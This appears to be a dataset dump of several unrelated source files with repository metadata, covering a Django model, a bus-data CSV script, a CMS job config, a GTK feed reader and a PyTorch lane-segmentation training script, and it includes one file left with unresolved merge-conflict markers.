"bhishantryphysics@gmail.com"
] | bhishantryphysics@gmail.com |
e0060018e6710ebdfebe141244402b1830d09827 | bb7fc0a16a824c836b96150c9575879ed1d4d866 | /chatMain/chatblog/models.py | 5e11e6df51a32d0362cd65dda5e34bd2be9a287d | [] | no_license | adarshmanwal/ATG_PART_2 | 5f62432178ec1a1dd0fe978024a546d1951fa673 | a84cb6f7553998571bbc4b23bfb5643450cf04dd | refs/heads/main | 2023-07-08T03:33:59.422029 | 2021-08-12T12:23:39 | 2021-08-12T12:23:39 | 393,096,727 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 535 | py | from django.db import models
from django.db.models.deletion import CASCADE
from django.utils import timezone
from django.contrib.auth.models import User
from django.urls import reverse
# Create your models here.
class post(models.Model):
content=models.TextField()
date_posted=models.DateTimeField(default=timezone.now)
author=models.ForeignKey(User,on_delete=models.CASCADE)
def __str__(self):
return self.content
def get_absolute_url(self):
return reverse('post-detail', kwargs={'pk': self.pk}) | [
"deepak.manwal@gmail.com"
] | deepak.manwal@gmail.com |
a71513cedd0cde5dc3fa0262fd7f5dc00c14565d | 506f9677a767bacad853f62c8d4bd7968c8c6a38 | /test.py | 891ddc1f64b48126233c8d0a13f3e490d34c19a2 | [] | no_license | danieldcl/Big-Data-Management-and-Analysis-1-BDM- | 17bd2159ec4b573081221416f96b463d62f8486f | e8d7ee8813f97d6258f79bdeeea082b1e09e4fa8 | refs/heads/master | 2021-01-10T12:47:36.832337 | 2016-03-17T18:30:29 | 2016-03-17T18:30:29 | 54,141,081 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,241 | py | import sys
import urllib2
import json
import csv
if __name__=='__main__':
with open(sys.argv[1], 'r') as jfile:
bus_data = json.load(jfile)
active_bus = bus_data['Siri']['ServiceDelivery']['VehicleMonitoringDelivery'][0]['VehicleActivity']
num_bus = len(active_bus)
with open(sys.argv[2], 'wb') as csvfile:
writer = csv.writer(csvfile)
writer.writerow(['Latitude', 'Longitude', 'Stop Name', 'Stop Status'])
for s in range(num_bus):
latitude = active_bus[s]['MonitoredVehicleJourney']['VehicleLocation']['Latitude']
longitude = active_bus[s]['MonitoredVehicleJourney']['VehicleLocation']['Longitude']
stop_name = "N/A"
stop_status = "N/A"
if active_bus[s]['MonitoredVehicleJourney']['OnwardCalls'] != "":
stop_name = active_bus[s]['MonitoredVehicleJourney']['OnwardCalls']['OnwardCall'][0]['StopPointName']
stop_status = active_bus[s]['MonitoredVehicleJourney']['OnwardCalls']['OnwardCall'][0]['Extensions']['Distances']['PresentableDistance']
row = [latitude, longitude, stop_name, stop_status]
writer.writerow(row)
| [
"dcliao92@gmail.com"
] | dcliao92@gmail.com |
84de335910a749a5a75b081e33561549701280e9 | 3ff80a99a95b9c0e13d9452eaa37419335e846ed | /VgammaTuplizer_normalfixed/Ntuplizer/crabconfigs/crab_MC2017ZJetsToQQ_HT400to600.py | 17a82a4951a08d04b9bf88d1728ce4f4e3d0a0f0 | [] | no_license | XL-Seb-Yan/WGammaProducer | 9a58a109c6a8429ce29c9d213864d32f8c33ff50 | 7d1edb4707b5eb60f9d5fe475b8ae347879372e6 | refs/heads/master | 2022-01-15T20:00:59.992103 | 2019-07-03T08:10:55 | 2019-07-03T08:10:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 961 | py | from CRABClient.UserUtilities import config, getUsernameFromSiteDB
config = config()
config.General.requestName = 'Wgamma2017_ZJetsToQQ_HT400to600_%s'%"Jul18"
config.General.workArea = 'crab_jobs_WgammaMC_2017_%s'%"Jul18"
config.General.transferOutputs = True
config.General.transferLogs = True
config.JobType.pluginName = 'Analysis'
config.JobType.psetName = 'VgammaTuplizer/Ntuplizer/config_generic.py'
config.JobType.inputFiles=[]
config.JobType.sendExternalFolder = True
config.Data.inputDataset = '/ZJetsToQQ_HT400to600_TuneCP5_13TeV-madgraphMLM-pythia8/RunIIFall17MiniAODv2-PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/MINIAODSIM'
config.Data.inputDBS = 'global'
config.Data.splitting = 'LumiBased'
config.Data.unitsPerJob = 30
config.Data.outLFNDirBase = '/store/user/%s/' % (getUsernameFromSiteDB())
config.Data.publication = False
config.Data.outputDatasetTag = 'Wgamma2017_ZJetsToQQ_HT400to600_%s'%"Jul18"
config.Site.storageSite = 'T3_US_FNALLPC'
| [
"xlyan0636@gmail.com"
] | xlyan0636@gmail.com |
f5b1709e79c2e79d06b7f94bf42ed7a723bccbf5 | 6f38cba464b2581875ae2e07ec5e15571cbf03db | /PythonBlog/dataModels/vo/tagVO.py | 9cada191c81a70d1c8e3d86ca647b0d991f60313 | [
"MIT"
] | permissive | Nohysiwe/FastAPIBlogBackend | 7c12100f2903c0ac86dc3932e8c8536408b5d7e1 | 2052c630a1a6e9bb9e6555f734c60020b107afc8 | refs/heads/main | 2023-04-19T16:37:56.459431 | 2021-05-21T03:53:55 | 2021-05-21T03:53:55 | 369,404,160 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 371 | py |
from typing import Optional
from pydantic import BaseModel, Field
__all__ = [
"TagVO",
]
class TagVO(BaseModel):
"""
标签 数据对象
"""
id: Optional[int] = Field(
None,
description = "标签id"
)
tagName: str = Field(
... ,
description = "标签名"
)
| [
"nohysiwe@163.com"
] | nohysiwe@163.com |
138f3980a1ed3012410d1099b138889cb25b7b8b | 3d39974209f890080456c5f9e60397c505540c64 | /0x0C-python-almost_a_circle/10-main.py | 72e7fa2d845bb5a79e7d1be760d234ee13cbc862 | [] | no_license | salmenz/holbertonschool-higher_level_programming | 293ca44674833b587f1a3aec13896caec4e61ab6 | 23792f8539db48c8f8200a6cdaf9268d0cb7d4e6 | refs/heads/master | 2020-09-28T11:42:51.264437 | 2020-05-13T22:56:39 | 2020-05-13T22:56:39 | 226,771,568 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 297 | py | #!/usr/bin/python3
""" 10-main """
from models.square import Square
if __name__ == "__main__":
s1 = Square(5)
print(s1)
print(s1.size)
s1.size = 10
print(s1)
try:
s1.size = "9"
except Exception as e:
print("[{}] {}".format(e.__class__.__name__, e))
| [
"salmen.zooro@gmail.com"
] | salmen.zooro@gmail.com |
c682c3d6b8228f2c6375fc241c377d4b1c3903de | 699b767e854162231914f4bce177382a9880f221 | /DFS/TreeMaxPathSum.py | 182314417155c65a2857262db0bdf7177a5a9278 | [] | no_license | XiwangLi/LeetcodeArchive | a66dc32f0a7248ff05cbe09dd0095191fefc602f | 3de4a48f9f7de2970cf02751c1620281bae0947d | refs/heads/master | 2021-04-28T02:57:55.604505 | 2019-02-28T01:07:51 | 2019-02-28T01:07:51 | 122,128,291 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,571 | py | <<<<<<< HEAD
# Binary Tree Maximum Path Sum
# Does not need to go through the root or leaf
class Solution(object):
def maxPathSum(self, root):
"""
:type root: TreeNode
:rtype: int
"""
res = [-float('inf')]
self.DFSpathSum(root, res)
return res[0]
def DFSpathSum(self, root, res):
if not root:
return 0
left = max(self.DFSpathSum(root.left, res), 0) #results from the left subtree
right = max(self.DFSpathSum(root.right, res), 0) #results from the right subtree
res[0] = max(res[0], left + right + root.val) # update the final results
return max(left, right) + root.val #return to the parent node
=======
# Binary Tree Maximum Path Sum
# Does not need to go through the root or leaf
class Solution(object):
def maxPathSum(self, root):
"""
:type root: TreeNode
:rtype: int
"""
res = [-float('inf')]
self.DFSpathSum(root, res)
return res[0]
def DFSpathSum(self, root, res):
if not root:
return 0
left = max(self.DFSpathSum(root.left, res), 0) #results from the left subtree. Use Max(...) to get rid of the negative sum
right = max(self.DFSpathSum(root.right, res), 0) #results from the right subtree
res[0] = max(res[0], left + right + root.val) # update the final results
return max(left, right) + root.val #return to the parent node
>>>>>>> 18230e1ad4d168e359c92a0c1e54c8c6631b56a1
| [
"xiwangli2010@gmail.com"
] | xiwangli2010@gmail.com |
05205ea19fd7e0e3f0373f1ce85fdf9ee2e29bb3 | db2a5b9cf84f72c264709df106044206fcd26b50 | /jadereader/gui/main_view.py | 5a7f0f2dca5d0cbf342140028cb7436f8903deb1 | [
"Apache-2.0"
] | permissive | pirobtumen/JadeReader | c792baf31753a10015d565b237182596dd49d58a | 8b605d255a68d8de7d08ff4b0cdfb067b95418c3 | refs/heads/master | 2021-01-19T03:04:55.189807 | 2016-07-28T18:11:20 | 2016-07-28T18:11:20 | 51,586,963 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,053 | py | """
Copyright 2016 Alberto Sola
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk
from gi.repository import Gio
from gui.lateral_menu_view import LateralMenu
from gui.source_row_view import SourceRow
from gui.feed_row_view import FeedRow
from src.url.urlmanager import UrlManager
from src.feed.feedmanager import FeedManager
class JadeReaderView(Gtk.Window):
    """Main window of the Jade Reader application.

    Layout: a horizontal pane with a lateral category menu on the left and a
    scrollable content area on the right.  The content area shows either
    downloaded feed entries or the configured sources, toggled by an
    action-bar button.
    """

    def __init__(self, url_manager):
        """Build the window, populate categories and enter the Gtk main loop.

        NOTE: Gtk.main() blocks, so this constructor does not return until
        the application quits.

        Args:
            url_manager: provider of categories and per-category source lists.
        """
        Gtk.Window.__init__(self, title="Jade Reader")
        self.resize(500, 300)
        # Attributes
        # --------------------
        self.url_manager = url_manager
        # When True the content pane shows feed entries, otherwise sources.
        self.show_feed = True
        # Events
        # --------------------
        self.connect("delete-event", Gtk.main_quit)
        # Widgets
        # --------------------
        hpane_main = Gtk.HPaned()
        self.add(hpane_main)
        self.lateral_menu = LateralMenu(self)
        hpane_main.add1(self.lateral_menu)
        self.set_main_widgets(hpane_main)
        # Initialize
        # --------------------
        self.load_categories(url_manager.get_categories())
        self.show_all()
        Gtk.main()

    def set_main_widgets(self, container):
        """Create the action bar and the scrollable content area inside *container*."""
        main_box = Gtk.VBox()
        # Action bar with the feed/sources toggle button.
        action_bar = Gtk.ActionBar()
        swap_feed_source_bttn = Gtk.Button("Sources")
        swap_feed_source_bttn.connect("clicked", self.swap_feed_source_bttn)
        action_bar.add(swap_feed_source_bttn)
        # Scrollable area that will host the ListBox of rows.
        self.scrolled_window = Gtk.ScrolledWindow()
        # Add to the view
        main_box.pack_start(action_bar, False, False, 0)
        main_box.pack_start(self.scrolled_window, True, True, 0)
        container.add2(main_box)

    # --------------------------------------------------------------------------
    def load_categories(self, categories_list):
        """Replace the lateral-menu entries with *categories_list*."""
        self.lateral_menu.clear()
        for category in categories_list:
            self.lateral_menu.add_category(category)

    def load_data(self, option_selected):
        """Refresh the content pane for the menu option just selected."""
        if option_selected == LateralMenu.OPTION_NONE:
            # TODO: handle "nothing selected"
            pass
        elif option_selected == LateralMenu.OPTION_ABOUT:
            pass
        elif self.show_feed:
            self.load_feed(option_selected)
        else:
            self.load_source(option_selected)
        self.show_all()

    def _get_source_list(self, option_selected):
        """Return the sources for *option_selected* (all categories for OPTION_ALL)."""
        if option_selected == LateralMenu.OPTION_ALL:
            # TODO: replace with a dedicated url_manager.get_all()
            source_list = []
            for category in self.url_manager.get_categories():
                source_list += self.url_manager.get_category(category)
            return source_list
        return self.url_manager.get_category(option_selected)

    def _replace_listbox(self):
        """Drop the current child of the scrolled window and return a fresh ListBox."""
        scrolled_window_child = self.scrolled_window.get_child()
        if scrolled_window_child is not None:
            self.scrolled_window.remove(scrolled_window_child)
        return Gtk.ListBox()

    def load_feed(self, option_selected):
        """Download and display the feed entries for *option_selected*."""
        feed_manager = FeedManager()
        data_listbox = self._replace_listbox()
        feed_list = feed_manager.download_feed(self._get_source_list(option_selected))
        for feed in feed_list:
            data_listbox.add(FeedRow(feed.get_title(), feed.get_data(), feed.get_link()))
        self.scrolled_window.add(data_listbox)

    def load_source(self, option_selected):
        """Display the configured sources for *option_selected*."""
        data_listbox = self._replace_listbox()
        for source in self._get_source_list(option_selected):
            data_listbox.add(SourceRow(source.get_name(), source.get_url(), source.get_feed()))
        self.scrolled_window.add(data_listbox)

    def swap_feed_source_bttn(self, button):
        """Toggle between feed and source view and reload the current selection."""
        self.show_feed = not self.show_feed
        # The label names the view the *next* click switches to.
        if self.show_feed:
            button.set_label("Sources")
        else:
            button.set_label("Feed")
        self.load_data(self.lateral_menu.get_option_selected())
| [
"albsolac@gmail.com"
] | albsolac@gmail.com |
29b8202e6ae862d20e5388fd87f63f7fb7a56db7 | b69eed4bd84419459cc5c5e1b3b197a53a931d37 | /v4/completion_segmentation_main_new_front.py | 17b2419c731ab05bd772b11b9f428ae0c0135ef9 | [
"MIT"
] | permissive | gongyan1/CFECA-and-Joint-coding-Model | 7b39b0da1ef01669109f2087823a776fe41e285f | 1d9c4c0769c526024d3d855d316e26473bd4688c | refs/heads/master | 2023-06-25T21:28:19.173246 | 2020-06-12T07:20:57 | 2020-06-12T07:20:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,323 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Apr 7 17:48:32 2020
@author: kerui
"""
import argparse
import os
import time
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.optim
import torch.utils.data
from dataloaders.completion_segmentation_loader_new_ import load_calib, oheight, owidth, input_options, KittiDepth
from completion_segmentation_model import DepthCompletionFrontNet
from metrics import AverageMeter, Result
import criteria
import completion_segmentation_helper
from inverse_warp import Intrinsics, homography_from
import numpy as np
import plot
# ---------------------------------------------------------------------------
# Command-line interface.  Several help strings are stale relative to the
# actual defaults (e.g. workers, image_height/width, lr) — kept verbatim.
parser = argparse.ArgumentParser(description='Sparse-to-Dense')
parser.add_argument('-w',
                    '--workers',
                    default=2,
                    type=int,
                    metavar='N',
                    help='number of data loading workers (default: 4)')
parser.add_argument('--epochs',
                    default=11,
                    type=int,
                    metavar='N',
                    help='number of total epochs to run (default: 11)')
parser.add_argument('--start-epoch',
                    default=0,
                    type=int,
                    metavar='N',
                    help='manual epoch number (useful on restarts)')
parser.add_argument('-c',
                    '--criterion',
                    metavar='LOSS',
                    default='l2',
                    choices=criteria.loss_names,
                    help='loss function: | '.join(criteria.loss_names) +
                    ' (default: l2)')
parser.add_argument('--image_height',
                    default=352,
                    type=int,
                    help='height of image for train (default: 80)')
parser.add_argument('--image_width',
                    default=1216,
                    type=int,
                    help='width of image for train (default: 80)')
parser.add_argument('-b',
                    '--batch-size',
                    default=1,
                    type=int,
                    help='mini-batch size (default: 1)')
parser.add_argument('--lr',
                    '--learning-rate',
                    default=1e-4,
                    type=float,
                    metavar='LR',
                    help='initial learning rate (default 1e-5)')
parser.add_argument('--weight-decay',
                    '--wd',
                    default=0,
                    type=float,
                    metavar='W',
                    help='weight decay (default: 0)')
parser.add_argument('--print-freq',
                    '-p',
                    default=10,
                    type=int,
                    metavar='N',
                    help='print frequency (default: 10)')
parser.add_argument('--resume',
                    default='',
                    type=str,
                    metavar='PATH',
                    help='path to latest checkpoint (default: none)')
parser.add_argument('--data-folder',
                    default='../data',
                    type=str,
                    metavar='PATH',
                    help='data folder (default: none)')
parser.add_argument('-i',
                    '--input',
                    type=str,
                    default='gd',
                    choices=input_options,
                    help='input: | '.join(input_options))
parser.add_argument('-l',
                    '--layers',
                    type=int,
                    default=34,
                    help='use 16 for sparse_conv; use 18 or 34 for resnet')
parser.add_argument('--pretrained',
                    action="store_true",
                    help='use ImageNet pre-trained weights')
parser.add_argument('--val',
                    type=str,
                    default="select",
                    choices=["select", "full"],
                    help='full or select validation set')
parser.add_argument('--jitter',
                    type=float,
                    default=0.1,
                    help='color jitter for images')
parser.add_argument(
    '--rank-metric',
    type=str,
    default='rmse',
    choices=[m for m in dir(Result()) if not m.startswith('_')],
    help='metrics for which best result is sbatch_datacted')
parser.add_argument(
    '-m',
    '--train-mode',
    type=str,
    default="dense",
    choices=["dense", "sparse", "photo", "sparse+photo", "dense+photo"],
    help='dense | sparse | photo | sparse+photo | dense+photo')
parser.add_argument('-e', '--evaluate', default='', type=str, metavar='PATH')
parser.add_argument('--cpu', action="store_true", help='run on cpu')
args = parser.parse_args()
# Derived flags: photometric training implies pose supervision.
args.use_pose = ("photo" in args.train_mode)
# args.pretrained = not args.no_pretrained
args.result = os.path.join('..', 'results/v4')
args.use_rgb = ('rgb' in args.input) or args.use_pose
args.use_d = 'd' in args.input
args.use_g = 'g' in args.input
if args.use_pose:
    # weights of the photometric loss terms (zero when pose is unused)
    args.w1, args.w2 = 0.1, 0.1
else:
    args.w1, args.w2 = 0, 0
print(args)
# Select compute device; cudnn autotuner is only enabled on GPU.
cuda = torch.cuda.is_available() and not args.cpu
if cuda:
    import torch.backends.cudnn as cudnn
    cudnn.benchmark = True
    device = torch.device("cuda")
else:
    device = torch.device("cpu")
print("=> using '{}' for computation.".format(device))
# define loss functions
# Class weights (background:lane pixel ratio -> [background, lane] weights);
# the original note below lists the candidate pairs that were tried.
'''类别权重
1:99 -> 0.01 0.99
1:9 -> 0.1 0.9
1:8 -> 1/9 8/9
1:4 -> 0.2 0.8
'''
class_weight = torch.tensor([0.1, 0.9])
# Semantic-segmentation losses (negative log-likelihood over per-pixel
# log-probabilities).
# NOTE(review): nn.NLLLoss2d is deprecated in modern PyTorch, and
# class_weight.cuda() runs at import time and requires a CUDA device —
# confirm the targeted torch version / hardware.
road_criterion = nn.NLLLoss2d()
lane_criterion = nn.NLLLoss2d(weight=class_weight.cuda())
if args.use_pose:
    # hard-coded KITTI camera intrinsics
    K = load_calib()
    fu, fv = float(K[0, 0]), float(K[1, 1])
    cu, cv = float(K[0, 2]), float(K[1, 2])
    kitti_intrinsics = Intrinsics(owidth, oheight, fu, fv, cu, cv)
    if cuda:
        kitti_intrinsics = kitti_intrinsics.cuda()
def acc(prediction, label, num_class=2):
    """Compute mean pixel accuracy and mean lane recall for a batch.

    Fixes over the original: the loop no longer reassigns the ``prediction``
    and ``label`` parameters, and unused unpacked values are discarded.
    Behavior is unchanged.

    Args:
        prediction: torch.Tensor of per-class scores, shape
            (batch, num_class, H, W); the argmax over dim 1 is the
            predicted label.
        label: torch.Tensor of ground-truth labels, shape (batch, H, W);
            pixels outside [0, num_class) are ignored.
        num_class: number of classes.  NOTE: the confusion-matrix indices
            below (count[0], count[3], count[2:]) are only correct for the
            binary case num_class == 2 (0 = background, 1 = lane).

    Returns:
        (acc_total, acc_lane):
            acc_total: mean per-image pixel accuracy (numpy scalar).
            acc_lane: mean lane recall over images with more than 100
                ground-truth lane pixels; falls back to torch.tensor([0.5])
                when no image qualifies (kept so callers can still invoke
                ``.item()``).
    """
    bs, _, h, w = prediction.size()
    # argmax over the class dimension -> (batch, H, W) predicted labels
    _, indices = prediction.max(1)
    acc_total = 0
    acc_lane = 0
    labels_np = label.numpy()
    counted = bs  # number of images with an "obvious" lane
    for i in range(bs):
        pred_i = indices[i].view(h, w).numpy()
        label_i = labels_np[i]
        # valid pixels only
        mask = (label_i >= 0) & (label_i < num_class)
        # flatten (gt, pred) pairs into confusion-matrix bin indices
        flat = num_class * label_i[mask].astype('int') + pred_i[mask]
        count = np.bincount(flat, minlength=num_class**2)
        # binary confusion bins: [TN, FP, FN, TP]
        acc_total += (count[0] + count[3]) / count.sum()
        if count[2:].sum() > 100:  # only images with obvious lanes will be counted
            acc_lane += count[3] / count[2:].sum()  # lane recall TP / (TP + FN)
        else:
            counted -= 1
    acc_total /= bs
    if counted:
        acc_lane /= counted  # only images with obvious lanes will be counted
    else:
        # no image had enough lane pixels; neutral fallback value
        acc_lane = torch.tensor([0.5])
    return acc_total, acc_lane
def iterate(mode, args, loader, model, optimizer, logger, best_acc, epoch):
    """Run one epoch of training or validation for lane segmentation.

    Args:
        mode: "train" or "val" (the assert also admits "eval",
            "test_prediction", "test_completion", but only the first two
            have full code paths below).
        args: parsed CLI namespace (uses args.lr for LR scheduling).
        loader: DataLoader yielding dicts of tensors incl. 'lane_label'.
        model: network; called as model(batch_data).
        optimizer: stepped in train mode only (pass None for val).
        logger: helper used to save predictions as images.
        best_acc: accuracy to beat; used to compute is_best.
        epoch: current epoch (epoch 0 uses fixed 0.5/0.5 class weights).

    Returns:
        train: (acc_avg, is_best, lane_loss_mean, lane_acc_mean, total_acc_mean)
        val:   (acc_avg, is_best, lane_acc_mean, total_acc_mean)
    """
    # NOTE(review): time.clock() was removed in Python 3.8; as written this
    # only runs on Python <= 3.7 (time.perf_counter() is the replacement).
    start_val = time.clock()
    nonsense = 0  # time spent on metric bookkeeping, excluded from the total
    acc_sum = 0
    # switch to appropriate mode
    assert mode in ["train", "val", "eval", "test_prediction", "test_completion"], \
        "unsupported mode: {}".format(mode)
    if mode == 'train':
        model.train()
        lr = completion_segmentation_helper.adjust_learning_rate(args.lr, optimizer, epoch)
    else:
        model.eval()
        lr = 0
    lane_acc_lst = []
    lane_loss_lst = []
    total_acc_lst = []
    for i, batch_data in enumerate(loader):
        start = time.time()
        # move every non-None tensor of the batch to the compute device
        batch_data = {
            key: val.to(device)
            for key, val in batch_data.items() if val is not None
        }
        # ground-truth label for road segmentation
        # NOTE(review): 'test_road_lane_segmentation' is never a legal mode
        # (see the assert above), so these conditions are always True.
        road_label = batch_data[
            'road_label'] if mode != 'test_road_lane_segmentation' else None
        # ground-truth label for lane-line segmentation
        lane_label = batch_data[
            'lane_label'] if mode != 'test_road_lane_segmentation' else None
        data_time = time.time() - start
        start = time.time()
        if mode == 'val':
            with torch.no_grad(): # no gradients during validation, saves GPU memory
                pred = model(batch_data)
        else:
            pred = model(batch_data)
        lane_pred = pred
        start_ = time.clock() # bookkeeping below is excluded from timing
        if mode == 'train':
            # semantic-segmentation loss
            #road_loss = road_criterion(road_pred, road_label.long())
            # From epoch 1 on, re-balance the class weights from the model's
            # own predicted lane-pixel ratio of the current batch.
            if epoch==0:
                class_weight = torch.tensor([0.5, 0.5])
            else:
                lane_pred_w = lane_pred.data.cpu()
                bs, c, h, w = lane_pred_w.size()
                value_w, index_w = lane_pred_w.max(1)
                LPW = 0  # mean fraction of pixels predicted as lane
                # NOTE(review): this inner loop reuses/overwrites the outer
                # batch index `i`, which is later passed to
                # logger.conditional_save_pred below — likely unintended.
                for i in range(bs):
                    lpw = index_w[i].view(h,w).numpy()
                    LPW += (np.count_nonzero(lpw)/lpw.size)
                LPW /= bs
                class_weight = torch.tensor([LPW,1-LPW])
            #print('class_weight: ',class_weight)
            lane_criterion = nn.NLLLoss2d(weight=class_weight.cuda())
            lane_loss = lane_criterion(lane_pred, lane_label.long())
            lane_loss_lst.append(lane_loss.item())
            # total loss (road term currently disabled)
            #loss = road_loss + lane_loss
            loss = lane_loss
            #print('lane loss {}'.format(lane_loss.data.cpu()))
            # accuracy
            #road_acc = acc(road_pred.data.cpu(), road_label.cpu())
            total_acc, lane_acc = acc(lane_pred.data.cpu(), lane_label.cpu())
            lane_acc_lst.append(lane_acc.item())
            total_acc_lst.append(total_acc.item())
            #print('total acc {}'.format(total_acc), 'lane acc {}'.format(lane_acc))
            #print('\n-------------------------epoch '+str(epoch)+'-----------------------------\n')
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()
        elif mode == 'val':
            # accuracy
            #road_acc = acc(road_pred.data.cpu(), road_label.cpu())
            total_acc, lane_acc = acc(lane_pred.data.cpu(), lane_label.cpu())
            lane_acc_lst.append(lane_acc.item())
            total_acc_lst.append(total_acc.item())
            #print('total acc {}'.format(total_acc), 'lane acc {}'.format(lane_acc))
            #print('\n------------------------epoch '+str(epoch)+'------------------------------\n')
            #accuracy = (road_acc+lane_acc)/2
            accuracy = lane_acc
            acc_sum += accuracy
        gpu_time = time.time() - start
        # measure accuracy and record loss
        with torch.no_grad():
            # save predictions as images
            # (`i` may have been clobbered by the inner loop above, see NOTE)
            logger.conditional_save_pred(mode, i, pred, epoch)
        nonsense += (time.clock()-start_)
    print('total cost time: ', time.clock()-start_val-nonsense)
    if mode=='train':
        lane_loss_mean = np.array(lane_loss_lst).mean()
        lane_acc_mean = np.array(lane_acc_lst).mean()
        total_acc_mean = np.array(total_acc_lst).mean()
        print('lane loss {}'.format(lane_loss_mean), 'lane acc {}'.format(lane_acc_mean), 'total acc {}'.format(total_acc_mean))
    elif mode=='val':
        lane_acc_mean = np.array(lane_acc_lst).mean()
        total_acc_mean = np.array(total_acc_lst).mean()
        print('lane acc {}'.format(lane_acc_mean), 'total acc {}'.format(total_acc_mean))
    print('\n-------------------------epoch '+str(epoch)+'-----------------------------\n')
    # acc_sum is only accumulated in 'val' mode, so acc_avg is 0 for 'train'.
    acc_avg = acc_sum/len(loader)
    is_best = (acc_avg>best_acc)
    # (disabled) per-epoch summary/checkpoint helpers
    # avg = logger.conditional_save_info(mode, average_meter, epoch)
    # is_best = logger.rank_conditional_save_best(mode, avg, epoch)
    # if is_best and not (mode == "train"):
    #     # save the best predictions as images during validation
    #     logger.save_img_comparison_as_best(mode, epoch)
    # logger.conditional_summarize(mode, avg, is_best)
    if mode == 'train':
        return acc_avg, is_best, lane_loss_mean, lane_acc_mean, total_acc_mean
    elif mode == 'val':
        return acc_avg, is_best, lane_acc_mean, total_acc_mean
def main():
    """Entry point: build model and loaders, then train / validate / evaluate.

    Launch modes driven by CLI flags:
      * --evaluate PATH: load a checkpoint and run validation only.
      * --resume PATH:   load a checkpoint and continue training from it.
      * default:         train from scratch.

    Per-epoch metrics are collected and dumped to timestamped files under
    ``log/`` when training finishes.
    """
    global args
    checkpoint = None
    is_eval = False
    if args.evaluate:
        args_new = args
        if os.path.isfile(args.evaluate):
            print("=> loading checkpoint '{}' ... ".format(args.evaluate),
                  end='')
            checkpoint = torch.load(args.evaluate, map_location=device)
            # adopt the checkpoint's args but keep the current invocation's
            # dataset location and validation split
            args = checkpoint['args']
            args.data_folder = args_new.data_folder
            args.val = args_new.val
            is_eval = True
            print("Completed.")
        else:
            print("No model found at '{}'".format(args.evaluate))
            return
    elif args.resume:  # optionally resume from a checkpoint
        args_new = args
        if os.path.isfile(args.resume):
            print("=> loading checkpoint '{}' ... ".format(args.resume),
                  end='')
            checkpoint = torch.load(args.resume, map_location=device)
            args.start_epoch = checkpoint['epoch'] + 1
            args.data_folder = args_new.data_folder
            args.val = args_new.val
            print("Completed. Resuming from epoch {}.".format(
                checkpoint['epoch']))
        else:
            print("No checkpoint found at '{}'".format(args.resume))
            return

    print("=> creating model and optimizer ... ", end='')
    model = DepthCompletionFrontNet(args).to(device)
    model_named_params = [
        p for _, p in model.named_parameters() if p.requires_grad
    ]
    optimizer = torch.optim.Adam(model_named_params,
                                 lr=args.lr,
                                 weight_decay=args.weight_decay)
    print("completed.")
    if checkpoint is not None:
        model.load_state_dict(checkpoint['model'])
        optimizer.load_state_dict(checkpoint['optimizer'])
        print("=> checkpoint state loaded.")

    model = torch.nn.DataParallel(model)

    # Data loading code
    print("=> creating data loaders ... ")
    if not is_eval:
        train_dataset = KittiDepth('train', args)
        train_loader = torch.utils.data.DataLoader(train_dataset,
                                                   batch_size=args.batch_size,
                                                   shuffle=True,
                                                   num_workers=args.workers,
                                                   pin_memory=True,
                                                   sampler=None)
        print("\t==> train_loader size:{}".format(len(train_loader)))
    val_dataset = KittiDepth('val', args)
    val_loader = torch.utils.data.DataLoader(
        val_dataset,
        batch_size=1,
        shuffle=False,
        num_workers=2,
        pin_memory=True)  # set batch size to be 1 for validation
    print("\t==> val_loader size:{}".format(len(val_loader)))

    # create backups and results folder
    logger = completion_segmentation_helper.logger(args)
    if checkpoint is not None:
        logger.best_result = checkpoint['best_result']
    print("=> logger created.")

    if is_eval:
        print("=> starting model evaluation ...")
        # BUGFIX: iterate() takes (mode, args, loader, model, optimizer,
        # logger, best_acc, epoch) and returns a 4-tuple in 'val' mode; the
        # original call omitted best_acc and unpacked only two values, which
        # raised at runtime.
        result, is_best, _, _ = iterate("val", args, val_loader, model, None,
                                        logger, 0, checkpoint['epoch'])
        return

    # main loop
    print("=> starting main loop ...")
    best_acc = 0
    # per-epoch metric history, dumped to log files after training
    train_lane_loss_list = []
    train_lane_acc_list = []
    train_total_acc_list = []
    val_lane_acc_list = []
    val_total_acc_list = []
    for epoch in range(args.start_epoch, args.epochs):
        print("=> starting training epoch {} ..".format(epoch))
        _, _, train_lane_loss, train_lane_acc, train_total_acc = iterate(
            "train", args, train_loader, model, optimizer, logger, best_acc,
            epoch)  # train for one epoch
        train_lane_loss_list.append(train_lane_loss)
        train_lane_acc_list.append(train_lane_acc)
        train_total_acc_list.append(train_total_acc)
        if (epoch % 5 == 0):
            result, is_best, val_lane_acc, val_total_acc = iterate(
                "val", args, val_loader, model, None, logger, best_acc,
                epoch)  # evaluate on validation set
            val_lane_acc_list.append(val_lane_acc)
            val_total_acc_list.append(val_total_acc)
            # BUGFIX: track the best validation accuracy so that is_best is
            # computed against the best seen so far, not against 0 forever.
            if is_best:
                best_acc = result
            completion_segmentation_helper.save_checkpoint({  # save checkpoint
                'epoch': epoch,
                'model': model.module.state_dict(),
                'best_result': result,
                'optimizer': optimizer.state_dict(),
                'args': args,
            }, is_best, epoch, logger.output_directory)

    def _dump(tag, values):
        # one metric value per line, timestamped file name under log/
        path = 'log/{}_v4_{}.txt'.format(
            tag,
            time.strftime('%Y-%m-%d-%H:%M:%S', time.localtime(time.time())))
        with open(path, 'w+') as f:
            f.writelines('\n'.join(str(v) for v in values))

    _dump('train_lane_loss', train_lane_loss_list)
    _dump('train_lane_acc', train_lane_acc_list)
    _dump('train_total_acc', train_total_acc_list)
